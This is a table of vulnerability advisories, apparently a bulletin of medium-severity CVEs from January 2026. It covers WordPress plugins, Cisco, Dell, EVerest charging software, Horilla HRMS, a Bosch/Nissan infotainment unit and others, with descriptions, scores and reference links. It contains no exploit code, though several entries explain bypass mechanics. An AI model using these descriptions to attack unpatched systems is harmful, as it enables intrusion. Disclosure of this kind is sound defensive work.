| birkir--prime | A vulnerability was found in birkir prime up to 0.4.0.beta.0. The impacted element is an unknown function of the file /graphql of the component GraphQL Array Based Query Batch Handler. The manipulation results in denial of service. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1173 | VDB-341767 (birkir prime GraphQL Array Based Query Batch graphql denial of service); VDB-341767 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731104 (birkir prime <=0.4.0 Graphql Array Based Query Batching Vulnerability); https://github.com/birkir/prime/issues/544 |
| birkir--prime | A vulnerability was determined in birkir prime up to 0.4.0.beta.0. This affects an unknown function of the file /graphql of the component GraphQL Alias Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1174 | VDB-341768 (birkir prime GraphQL Alias graphql resource consumption); VDB-341768 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731105 (birkir prime <=0.4.0 GraphQL Aliases Overloading Vulnerability); https://github.com/birkir/prime/issues/545 |
| birkir--prime | A vulnerability was identified in birkir prime up to 0.4.0.beta.0. This impacts an unknown function of the file /graphql of the component GraphQL Directive Handler. Such manipulation leads to information exposure through error message. The attack may be performed from remote. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1175 | VDB-341769 (birkir prime GraphQL Directive graphql information exposure); VDB-341769 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731106 (birkir prime <=0.4.0 GraphQL Directive Information Disclosure); https://github.com/birkir/prime/issues/546 |
| birkir--prime | A security vulnerability has been detected in birkir prime up to 0.4.0.beta.0. This vulnerability affects unknown code. Such manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 4.3 | CVE-2026-1169 | VDB-341763 (birkir prime cross-site request forgery); VDB-341763 (CTI Indicators (IOB, IOC)); Submit #731287 (birkir prime <=0.4.0 CSRF); https://github.com/birkir/prime/issues/547 |
| Bjskzy--Zhiyou ERP | A vulnerability was detected in Bjskzy Zhiyou ERP up to 11.0. Impacted is the function initRCForm of the file RichClientService.class of the component com.artery.richclient.RichClientService. Performing a manipulation results in xml external entity reference. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 6.3 | CVE-2026-1218 | VDB-341908 (Bjskzy Zhiyou ERP com.artery.richclient.RichClientService RichClientService.class initRCForm xml external entity reference); VDB-341908 (CTI Indicators (IOB, IOC, IOA)); Submit #735201 (Bjskzy Enterprise Resource Planning Software 11.0 XML External Entity Reference); https://github.com/dingpotian/cve-vul/blob/main/Shikong-Zhiyou-ERP/Shikong-Zhiyou-ERP-XXE-RichClientService-initRCForm.md |
| BloofoxCMS--BloofoxCMS | BloofoxCMS 0.5.2.1 contains a stored cross-site scripting vulnerability in the articles text parameter that allows authenticated attackers to inject malicious scripts. Attackers can insert malicious javascript payloads in the text field to execute scripts and potentially steal authenticated users' cookies. | 2026-01-23 | 6.4 | CVE-2021-47906 | ExploitDB-49492 Official Vendor Homepage BloofoxCMS Software Releases VulnCheck Advisory: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting |
| Bosch--Infotainment system ECU | The Infotainment ECU manufactured by Bosch which is installed in Nissan Leaf ZE1 - 2020 uses a Redbend service for over-the-air provisioning and updates. HTTPS is used for communication with the back-end server. Due to usage of the default configuration for the underlying SSL engine, the server root certificate is not verified. As a result, an attacker may be able to impersonate a Redbend backend server using a self-signed certificate. First identified on Nissan Leaf ZE1 manufactured in 2020. | 2026-01-22 | 6.5 | CVE-2025-32057 | https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch |
| Bosch--Infotainment system ECU | The anti-theft protection mechanism can be bypassed by attackers due to weak response generation algorithms for the head unit. It is possible to reveal all 32 corresponding responses by sniffing CAN traffic or by pre-calculating the values, which allows the protection to be bypassed. First identified on Nissan Leaf ZE1 manufactured in 2020. | 2026-01-22 | 4 | CVE-2025-32056 | https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch |
| brainstormforce--Custom Fonts Host Your Fonts Locally | The Custom Fonts - Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete font directory and rewrite theme.json file. | 2026-01-20 | 5.3 | CVE-2025-14351 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88 https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts |
| bramdnl--Star Review Manager | The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1076 | https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3 https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3 |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Insufficiently Protected Credentials vulnerability, allowing privileged, authenticated remote attackers to obtain SMTP plaintext passwords through the web frontend. | 2026-01-20 | 4.9 | CVE-2026-1223 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| cantothemes--Canto Testimonials | The Canto Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'fx' shortcode attribute in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1095 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f2ef250-f951-4408-ac42-3272ddf46530?source=cve https://plugins.trac.wordpress.org/browser/canto-testimonials/trunk/canto-testimonials.php#L132 https://plugins.trac.wordpress.org/browser/canto-testimonials/tags/1.0/canto-testimonials.php#L132 |
| Cisco--Cisco Intersight Virtual Appliance | A vulnerability in the read-only maintenance shell of Cisco Intersight Virtual Appliance could allow an authenticated, local attacker with administrative privileges to elevate privileges to root on the virtual appliance. This vulnerability is due to improper file permissions on configuration files for system accounts within the maintenance shell of the virtual appliance. An attacker could exploit this vulnerability by accessing the maintenance shell as a read-only administrator and manipulating system files to grant root privileges. A successful exploit could allow the attacker to elevate their privileges to root on the virtual appliance and gain full control of the appliance, giving them the ability to access sensitive information, modify workloads and configurations on the host system, and cause a denial of service (DoS). | 2026-01-21 | 6 | CVE-2026-20092 | cisco-sa-intersight-privesc-p6tBm6jk |
| Cisco--Cisco Packaged Contact Center Enterprise | Multiple vulnerabilities in the web-based management interface of Cisco Packaged Contact Center Enterprise (Packaged CCE) and Cisco Unified Contact Center Enterprise (Unified CCE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. These vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid administrative credentials. | 2026-01-21 | 4.8 | CVE-2026-20055 | cisco-sa-ucce-pcce-xss-2JVyg3uD |
| Cisco--Cisco Packaged Contact Center Enterprise | Multiple vulnerabilities in the web-based management interface of Cisco Packaged Contact Center Enterprise (Packaged CCE) and Cisco Unified Contact Center Enterprise (Unified CCE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. These vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid administrative credentials. | 2026-01-21 | 4.8 | CVE-2026-20109 | cisco-sa-ucce-pcce-xss-2JVyg3uD |
| Cisco--Cisco Ultra-Reliable Wireless Backhaul | A vulnerability in the SSH service of Cisco IEC6400 Wireless Backhaul Edge Compute Software could allow an unauthenticated, remote attacker to cause the SSH service to stop responding. This vulnerability exists because the SSH service lacks effective flood protection. An attacker could exploit this vulnerability by initiating a denial of service (DoS) attack against the SSH port. A successful exploit could allow the attacker to cause the SSH service to be unresponsive during the period of the DoS attack. All other operations remain stable during the attack. | 2026-01-21 | 5.3 | CVE-2026-20080 | cisco-sa-iec6400-Pem5uQ7v |
| Click2Magic--Click2Magic | Click2Magic 1.1.5 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts in the chat name input. Attackers can craft a malicious payload in the chat name to capture administrator cookies when the admin processes user requests. | 2026-01-25 | 6.4 | CVE-2020-36931 | ExploitDB-49347 Vendor Homepage Official Product Website VulnCheck Advisory: Click2Magic 1.1.5 - Stored Cross-Site Scripting |
| codemacher--CM CSS Columns | The CM CSS Columns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' shortcode attribute in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1098 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dabcc606-04ab-4fb0-bf3c-d3ad915b8904?source=cve https://plugins.trac.wordpress.org/browser/cm-css-columns/trunk/includes/Shortcoder.php#L109 https://plugins.trac.wordpress.org/browser/cm-css-columns/tags/1.2.1/includes/Shortcoder.php#L109 |
| controlplaneio-fluxcd--flux-operator | The Flux Operator is a Kubernetes CRD controller that manages the lifecycle of CNCF Flux CD and the ControlPlane enterprise distribution. Starting in version 0.36.0 and prior to version 0.40.0, a privilege escalation vulnerability exists in the Flux Operator Web UI authentication code that allows an attacker to bypass Kubernetes RBAC impersonation and execute API requests with the operator's service account privileges. In order to be vulnerable, cluster admins must configure the Flux Operator with an OIDC provider that issues tokens lacking the expected claims (e.g., `email`, `groups`), or configure custom CEL expressions that can evaluate to empty values. After OIDC token claims are processed through CEL expressions, there is no validation that the resulting `username` and `groups` values are non-empty. When both values are empty, the Kubernetes client-go library does not add impersonation headers to API requests, causing them to be executed with the flux-operator service account's credentials instead of the authenticated user's limited permissions. This can result in privilege escalation, data exposure, and/or information disclosure. Version 0.40.0 patches the issue. | 2026-01-21 | 5.3 | CVE-2026-23990 | https://github.com/controlplaneio-fluxcd/flux-operator/security/advisories/GHSA-4xh5-jcj2-ch8q https://github.com/controlplaneio-fluxcd/flux-operator/pull/610 https://github.com/controlplaneio-fluxcd/flux-operator/commit/084540424f6de8ba5d88fb1fd1e8472ba29afd7e https://github.com/controlplaneio-fluxcd/flux-operator/releases/tag/v0.40.0 |
| CRMEB--CRMEB | A weakness has been identified in CRMEB up to 5.6.3. The impacted element is the function remoteRegister of the file crmeb/app/services/user/LoginServices.php of the component JSON Token Handler. Executing a manipulation of the argument uid can lead to improper authentication. The attack may be performed from remote. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 5.6 | CVE-2026-1203 | VDB-341789 (CRMEB JSON Token LoginServices.php remoteRegister improper authentication); VDB-341789 (CTI Indicators (IOB, IOC, IOA)); Submit #735349 (Zhongbang CRMEB v5.6.3 Authentication Bypass) by https://github.com/foeCat/CVE/blob/main/CRMEB/jwt_auth_bypass/remote_register_jwt_bypass.md |
| cubewp1211--CubeWP Framework | The CubeWP - All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.27 via the search feature in class-cubewp-search-ajax-hooks.php due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-01-25 | 4.3 | CVE-2025-6461 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0edb6b7c-8a78-44b9-a5d6-b4a563c92484?source=cve https://plugins.trac.wordpress.org/changeset/3422640/cubewp-framework/trunk/cube/modules/search/class-cubewp-search-ajax-hooks.php |
| Dell--Data Protection Advisor | Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-01-23 | 4.3 | CVE-2025-46699 | https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contain a Cleartext Transmission of Sensitive Information vulnerability in the Fabric Syslog. An unauthenticated attacker with remote access could potentially exploit this vulnerability to intercept and modify information in transit. | 2026-01-23 | 6.5 | CVE-2026-22274 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contain a Cleartext Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information disclosure. | 2026-01-23 | 5.5 | CVE-2026-22276 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contain an Inclusion of Sensitive Information in Source Code vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2026-01-23 | 4.4 | CVE-2026-22275 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions 9.5.0.0 through 9.5.1.5, versions 9.6.0.0 through 9.7.1.10, versions 9.8.0.0 through 9.10.1.3, versions starting from 9.11.0.0 and prior to 9.13.0.0, contains an incorrect permission assignment for critical resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-01-22 | 5 | CVE-2026-22280 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.13.0.0, contains an insufficient logging vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information tampering. | 2026-01-22 | 4.3 | CVE-2026-22279 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce validation on the SurveyJS_AddSurvey AJAX action. This makes it possible for unauthenticated attackers to create surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13139 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c06880e-06cc-4204-a031-355de4de3af2?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/add_survey.php#L12 |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce verification on the 'SurveyJS_RenameSurvey' AJAX action. This makes it possible for unauthenticated attackers to rename surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13194 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab88f0cf-971f-43e1-b6b7-4eb55188ecc8?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/rename_survey.php#L12 |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13205 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1179303-fe7c-47f1-958c-2e4d2c574e4a?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/clone_survey.php#L8 |
| Discord--WebSocket API service | Discord through 2026-01-16 allows gathering information about whether a user's client state is Invisible (and not actually offline) because the response to a WebSocket API request includes the user in the presences array (with "status": "offline"), whereas offline users are omitted from the presences array. This is arguably inconsistent with the UI description of Invisible as "You will appear offline." | 2026-01-22 | 4.3 | CVE-2026-24332 | https://xmrcat.org/discord-invisibility-bypass |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, C++ exceptions raised in or around the `TbdController` loop are not properly handled, so the loop and its caller terminate silently. Because this loop is responsible for the SDP and ISO 15118-20 servers, the result is a denial of service. Version 2025.10.0 fixes the issue. | 2026-01-21 | 6.5 | CVE-2025-68135 | https://github.com/EVerest/everest-core/security/advisories/GHSA-g7mm-r6qp-96vh |
| EVerest--everest-core | EVerest is an EV charging software stack, and EVerest libocpp is a C++ implementation of the Open Charge Point Protocol. In libocpp prior to version 0.30.1, pointers returned by the `strdup` calls are never freed. At each connection attempt, the newly allocated memory area will be leaked, potentially causing memory exhaustion and denial of service. Version 0.30.1 fixes the issue. | 2026-01-21 | 4.7 | CVE-2025-68138 | https://github.com/EVerest/everest-core/security/advisories/GHSA-f8c2-44c3-7v55 https://github.com/EVerest/libocpp/blob/89c7b62ec899db637f43b54f19af2c4af30cfa66/lib/ocpp/common/websocket/websocket_libwebsockets.cpp |
| EVerest--everest-core | EVerest is an EV charging software stack. In all versions up to and including 2025.12.1, the default value for `terminate_connection_on_failed_response` is `False`, which leaves the responsibility for session and connection termination to the EV. In this configuration, any errors encountered by the module are logged but do not trigger countermeasures such as session and connection reset or termination. A malicious user could abuse this in order to exploit other weaknesses or vulnerabilities. While the default will stay at the setting described as potentially problematic in this reported issue, a mitigation is available by changing the `terminate_connection_on_failed_response` setting to `true`. However, this cannot be made the default value, since it can trigger errors in vehicle ECUs that require ECU resets and lengthy charging unavailability for the affected vehicles. The maintainers judge avoiding that to be much more important than the short-term unavailability of an EVSE, so this setting will stay at the current value. | 2026-01-21 | 4.3 | CVE-2025-68139 | https://github.com/EVerest/everest-core/security/advisories/GHSA-wqh4-pj54-6xv9 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.9.0, once the validity of a received V2G message has been verified, the submitted session ID is checked against the registered one. However, if no session has been registered, the registered value defaults to 0, so a message submitted with a session ID of 0 is accepted because it matches the registered value. This could allow unauthorized and anonymous indirect emission of MQTT messages and communication with the V2G message handlers, updating a session context. Version 2025.9.0 fixes the issue. | 2026-01-21 | 4.3 | CVE-2025-68140 | https://github.com/EVerest/everest-core/security/advisories/GHSA-w385-3jwp-x47x |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.9.0, in several places an integer value is concatenated to a string literal when an error is thrown. In C++ this performs pointer arithmetic on the literal (offsetting the `const char*` by the integer) rather than formatting the integer into the message as it would in most interpreted languages, so the resulting message starts at an unintended address. A malicious operator can use this to read unintended memory regions, including the heap and the stack. Version 2025.9.0 fixes the issue. | 2026-01-21 | 4.2 | CVE-2026-23955 | https://github.com/EVerest/everest-core/security/advisories/GHSA-px57-jx97-hrff |
| filebrowser--filebrowser | File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the `JSONAuth.Auth` function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the `/api/login` endpoint. The vulnerability exists because of "short-circuit" evaluation in the authentication logic: when a username is not found in the database, the function returns immediately, but when the username does exist, the code proceeds to verify the password with bcrypt (`users.CheckPwd`), a deliberately expensive operation. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue. | 2026-01-19 | 5.3 | CVE-2026-23849 | https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889 |
| flatboy--FlatPM Ad Manager, AdSense and Custom Code | The FlatPM - Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 6.4 | CVE-2026-0690 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14b89618-8a30-4b8c-9490-f05e8fa8ca8a?source=cve https://plugins.trac.wordpress.org/changeset/3434760/flatpm-wp |
| Foxit Software Inc.--na1.foxitesign.foxit.com | URL parameters are directly embedded into JavaScript code or HTML attributes without proper encoding or sanitization. This allows attackers to inject arbitrary scripts when an authenticated user visits a crafted link. This issue affects na1.foxitesign.foxit.com: before 2026-01-16. | 2026-01-20 | 6.1 | CVE-2025-66523 | https://www.foxit.com/support/security-bulletins.html |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Prior to version 1.7.71, a rate limiting bypass via `X-Forwarded-For` header spoofing allows unauthenticated attackers to bypass IP-based rate limiting on general API endpoints. Attackers can spoof client IPs by manipulating the `X-Forwarded-For` header, enabling unlimited requests to protected endpoints, including general API endpoints (enabling DoS) and other rate-limited functionality. Version 1.7.71 contains a patch for the issue. | 2026-01-19 | 6.5 | CVE-2026-23848 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-59gr-529g-x45h https://github.com/franklioxygen/MyTube/commit/bc057458804ae7ac70ea00605680512ed3d4257b |
| freemp--JavaScript Notifier | The JavaScript Notifier plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 1.2.8. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the `wp_footer` action. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 4.4 | CVE-2026-1191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/97696702-4d40-41dd-a25f-f2ee7681a2c9?source=cve https://plugins.trac.wordpress.org/browser/javascript-notifier/trunk/javascript-notifier.php#L75 https://plugins.trac.wordpress.org/browser/javascript-notifier/tags/1.2.8/javascript-notifier.php#L75 |
| GetSimple CMS--Custom JS Plugin | GetSimple CMS Custom JS 0.1 plugin contains a cross-site request forgery vulnerability that lets unauthenticated attackers inject arbitrary client-side code into administrator browsers. An attacker can craft a malicious website that, when visited by an authenticated administrator, forges a request that stores a cross-site scripting payload; that payload can in turn be used to execute code on the hosting server (CSRF to XSS to RCE). | 2026-01-21 | 5.3 | CVE-2021-47860 | ExploitDB-49816 Vendor Homepage GetSimple CMS GitHub Repository Researcher Disclosure ExploitDB-49712 VulnCheck Advisory: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.1 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that under certain circumstances could have allowed an authenticated user to create a denial of service condition by configuring malformed Wiki documents that bypass cycle detection. | 2026-01-22 | 6.5 | CVE-2025-13335 | GitLab Issue #581060 HackerOne Bug Bounty Report #3418023 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.3 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to create a denial of service condition by sending repeated malformed SSH authentication requests. | 2026-01-22 | 5.3 | CVE-2026-1102 | GitLab Issue #579746 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| hallsofmontezuma--Moderate Selected Posts | The Moderate Selected Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing nonce verification on the msp_admin_page() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14907 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bc23291-1b73-4e92-83ba-0c7f455ac126?source=cve https://plugins.trac.wordpress.org/browser/moderate-selected-posts/tags/1.4/inc/admin.php#L71 |
| HAMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to access specific API functions and obtain meeting-related information. | 2026-01-22 | 5.3 | CVE-2026-1332 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In versions prior to 1.5.0, a cross-site scripting vulnerability can be triggered because the extension and content-type are not checked during the profile photo update step. Version 1.5.0 fixes the issue. | 2026-01-22 | 5.4 | CVE-2026-24034 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-mvwg-7c8w-qw2p https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). Versions 1.4.0 and above expose unpublished job postings through the /recruitment/recruitment-details// endpoint without authentication. The response includes draft job titles, descriptions and the application link, allowing unauthenticated users to view unpublished roles and access the application workflow for unpublished jobs. Unauthorized access to unpublished job posts can leak sensitive internal hiring information and cause confusion among candidates. This issue has been fixed in version 1.5.0. | 2026-01-22 | 5.3 | CVE-2026-24036 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-q4xr-w96p-3vg7 https://github.com/horilla-opensource/horilla/commit/9a585a1588431499092a49d7e82cb77daa4d99ee https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). An Improper Access Control vulnerability exists in Horilla HR Software starting in version 1.4.0 and prior to version 1.5.0. Because the `employee_id` parameter is not sufficiently validated server-side during file upload operations, any authenticated employee can upload documents on behalf of any other employee without proper authorization. Version 1.5.0 fixes the issue. | 2026-01-22 | 4.3 | CVE-2026-24035 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-fm3f-xpgx-8xr3 https://drive.google.com/file/d/1i00-NnipvxH8bGY-SyqEjnDQfxIbVGRR/view?usp=sharing https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In version 1.4.0, the has_xss() function attempts to block XSS by matching input against a set of regex patterns. However, the regexes are incomplete and context-agnostic, making them easy to bypass. Attackers are able to redirect users to malicious domains, run external JavaScript, and steal CSRF tokens that can be used to craft CSRF attacks against admins. This issue has been fixed in version 1.5.0. | 2026-01-22 | 4.8 | CVE-2026-24037 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-rqw5-fjm4-rgvm https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). Version 1.4.0 has Improper Access Control, allowing low-privileged employees to self-approve documents they have uploaded. The document-approval UI is intended to be restricted to administrator or high-privilege roles only; however, an insufficient server-side authorization check on the approval endpoint lets a standard employee modify the approval status of their own uploaded document. A successful exploitation allows users with only employee-level permissions to alter application state reserved for administrators. This undermines the integrity of HR processes (for example, acceptance of credentials, certifications, or supporting materials), and may enable submission of unvetted documents. This issue is fixed in version 1.5.0. | 2026-01-22 | 4.3 | CVE-2026-24039 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-99mq-mhwv-w9qx https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| IBM--Application Gateway | IBM Application Gateway 23.10 through 25.09 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36396 | https://www.ibm.com/support/pages/node/7256857 |
